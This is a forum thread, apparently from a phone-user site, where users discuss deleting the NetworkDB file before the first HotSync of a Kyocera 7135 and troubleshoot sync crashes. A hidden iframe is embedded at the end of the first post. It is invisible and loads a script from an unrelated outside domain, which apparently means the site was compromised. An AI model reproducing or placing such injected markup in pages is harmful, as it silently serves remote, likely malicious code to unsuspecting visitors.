+ Reply to Thread

Remove NetworkDB.prc before first sync

The docs in the box say that existing Palm users should remove Saved_Preferences.prc before the first sync.

But the Kyocera support web site says to remove Saved_Preferences.prc and the NetworkDB.prc files.

(Read it here http://support.kyocera-wireless.com/...ic/kyo1055.htm)

I did not remove NetworkDB.prc and my 7135 died immediately after surfing the web for the first time.

I mean DIED! It failed to HARD RESET. I had to get a new phone.

Coincidence, perhaps.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Remove NetworkDB.prc before first sync

Originally posted by maven
    The docs in the box say that existing Palm users should remove Saved_Preferences.prc before the first sync.

But the Kyocera support web site says to remove Saved_Preferences.prc and the NetworkDB.prc files.

(Read it here http://support.kyocera-wireless.com/...ic/kyo1055.htm)

I did not remove NetworkDB.prc and my 7135 died immediately after surfing the web for the first time.

I mean DIED! It failed to HARD RESET. I had to get a new phone.

Coincidence, perhaps.
    Mine didn't die permenently, but I defenitly had lots of problems until I deleted the networkDB.prc from my backup and did a hard reset and synced again.

Alan

Do you really need to do a hard reset, wouldn't a hot synch word after you deleted the file on the desktop? Then maybe a soft reset?

Also, the file reads NetworkDB.PDB Not PRC.

Thanks

Administrator
    its always best to start fresh with a new phone .. you wont have any issues down the road later... best to spend the time in the beginning imo...

I can add my testimonial support for this one.

I followed the instructions that came with the phone and deleted Saved_Preferences.prc before HotSync'ing and everything was fine until I added snappermail. After that I experienced a crash and soft reset after each HotSync (fun, fun, fun). After reading this post and deleting the NetworkDB.prc , my crash problem is gone (for now, knocking on wood. . . ).

What does this remark mean..."Also, the file reads NetworkDB.PDB Not PRC. "?

The Kyocera website says "it is important that the Saved_Preferences.prc and the NetworkDB.prc files "

slor:

It is "NetworkDB.PDB," not "NetworkDB.prc." (I mis-spoke too) PDB = Palm Database File, which this one is. PRC = Palm Aplication, which this is not.

Originally posted by thomaskemp
    I can add my testimonial support for this one.

I followed the instructions that came with the phone and deleted Saved_Preferences.prc before HotSync'ing and everything was fine until I added snappermail. After that I experienced a crash and soft reset after each HotSync (fun, fun, fun). After reading this post and deleting the NetworkDB.prc , my crash problem is gone (for now, knocking on wood. . . ).
    I also had sync problems after the install of Snappermail. In my case, it didn't have to do with networkdb.pdb. I was able to trace it to the following situation: When I first got the phone, I installed QuickOffice and its desktop off the CD, registered it, etc. Then I got the Snapper demo, including a demo of QO Premiere. Installed this, and got a crash/reset at the end of every sync. Interestingly, rather than adding the Premiere demo in addition to the registered QO, it replaced it. I eventually figured out that it was the Quicksheet conduit that was causing the crash. (When I disabled that conduit, no crash.) Apparently the new QS on the Palm didn't want to talk to the old Desktop/Conduit on the PC. When I uninstalled QO entirely, and then reinstalled with a Premiere demo from the Cutting Edge site, including a new desktop installation, everything worked fine.